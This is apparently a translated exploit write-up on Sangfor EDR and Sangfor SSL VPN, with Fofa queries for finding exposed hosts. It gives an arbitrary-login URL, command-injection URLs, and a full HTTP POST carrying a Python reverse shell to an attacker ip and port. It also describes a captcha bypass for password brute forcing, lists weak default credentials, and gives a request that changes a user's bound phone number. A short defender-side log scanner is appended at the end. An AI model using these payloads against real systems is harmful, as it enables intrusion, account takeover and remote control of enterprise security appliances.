Sangfor Endpoint Detection and Response Platform (EDR)
Fofa syntax: title="终端检测响应平台"
1. Arbitrary user login vulnerability
Affected versions
EDR <= v3.2.19
Vulnerability reproduction
payload: user=<any username>
https://XXX/ui/login.php?user=admin
2. Arbitrary command execution (1)
Affected versions
3.2.16
3.2.17
3.2.19
Vulnerability reproduction
payload:
https://www.0-sec.org/tool/log/c.php?strip_slashes=system&limit=whoami
https://www.0-sec.org/tool/log/c.php?strip_slashes=system&host=whoami
https://www.0-sec.org/tool/log/c.php?strip_slashes=system&path=whoami
https://www.0-sec.org/tool/log/c.php?strip_slashes=system&row=whoami
Command execution via the host parameter
Reverse shell payload:
POST /tool/log/c.php HTTP/1.1
Host: xxx
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b1464478cad68327229d8f46e60d0a08; _ga=GA1.4.112365795.1597799903; _gid=GA1.4.1225783590.1597799903
Content-Length: 256

strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Sangfor SSL VPN - Pre Auth
Fingerprint:
/por/login_auth.csp?apiversion=1
sangfor/cgi-bin/login.cgi?rnd=
Fofa:
app="深信服-SSL-VPN"
1. Password brute force
On user login, after several failed attempts the page demands a captcha; entering a wrong captcha gives the prompt "校验码错误或校验码已过期" (captcha wrong or expired). Modifying the login request packet so that the cookie and the captcha field are emptied bypasses the captcha, after which the prompt becomes "用户名或密码错误" (wrong username or password).
The encrypted password is sha1(password+sid).
Brute forcing only locks the IP for a while; leave it running overnight and it is done. The weak passwords are just the usual few: admin/123456/Sangfor/Sangfor@123
2. Arbitrary password reset
3. Changing the bound phone number
POC
https://www.0-sec.org/por/changetelnum.csp?apiversion=1
POST parameters:
newtel=<new phone number>&sessReq=clusterd&username=<username>&grpid=0&sessid=0&ip=127.0.0.1
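As an added defender-side example (not from the original post), the following Python flags web-server access-log lines that match the request patterns listed on this page for both the EDR and the SSL VPN sections. The sample log lines and the finding labels are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample lines in combined access-log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Aug/2020:10:01:02 +0800] "GET /ui/login.php?user=admin HTTP/1.1" 302 0
10.0.0.5 - - [20/Aug/2020:10:01:09 +0800] "GET /tool/log/c.php?strip_slashes=system&host=whoami HTTP/1.1" 200 512
10.0.0.7 - - [20/Aug/2020:10:02:15 +0800] "POST /tool/log/c.php HTTP/1.1" 200 512
10.0.0.9 - - [20/Aug/2020:10:03:40 +0800] "POST /por/changetelnum.csp?apiversion=1 HTTP/1.1" 200 64
10.0.0.9 - - [20/Aug/2020:10:04:01 +0800] "GET /index.html HTTP/1.1" 200 1024
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The four parameters the page shows carrying the command when strip_slashes=system.
SINK_PARAMS = {"limit", "host", "path", "row"}


def classify(method, target):
    """Return a finding label for one request, or None if it matches none of the page's patterns."""
    u = urlparse(target)
    params = {k.lower(): v for k, v in parse_qs(u.query, keep_blank_values=True).items()}
    path = u.path.lower()
    if path.endswith("/ui/login.php") and "user" in params:
        return "EDR: login.php called with user= (auth bypass pattern)"
    if path.endswith("/tool/log/c.php"):
        callbacks = {v.strip().lower() for v in params.get("strip_slashes", [])}
        if "system" in callbacks and SINK_PARAMS & params.keys():
            return "EDR: c.php strip_slashes=system with a command parameter (RCE pattern)"
        # POST bodies are not in the access log, so any other hit on c.php still needs review.
        return "EDR: c.php hit (review; body parameters not visible here)"
    if method == "POST" and path.endswith("/por/changetelnum.csp"):
        return "SSL VPN: POST to changetelnum.csp (bound-phone change; verify the session)"
    return None


def scan(log_text):
    """Return (ip, timestamp, label) for every log line that matches a pattern from this page."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            label = classify(m["method"], m["target"])
            if label:
                findings.append((m["ip"], m["ts"], label))
    return findings
```

Standard access logs carry only the request line, so the POST-body variant of the c.php payload is visible only with request-body logging or a WAF in front of the host.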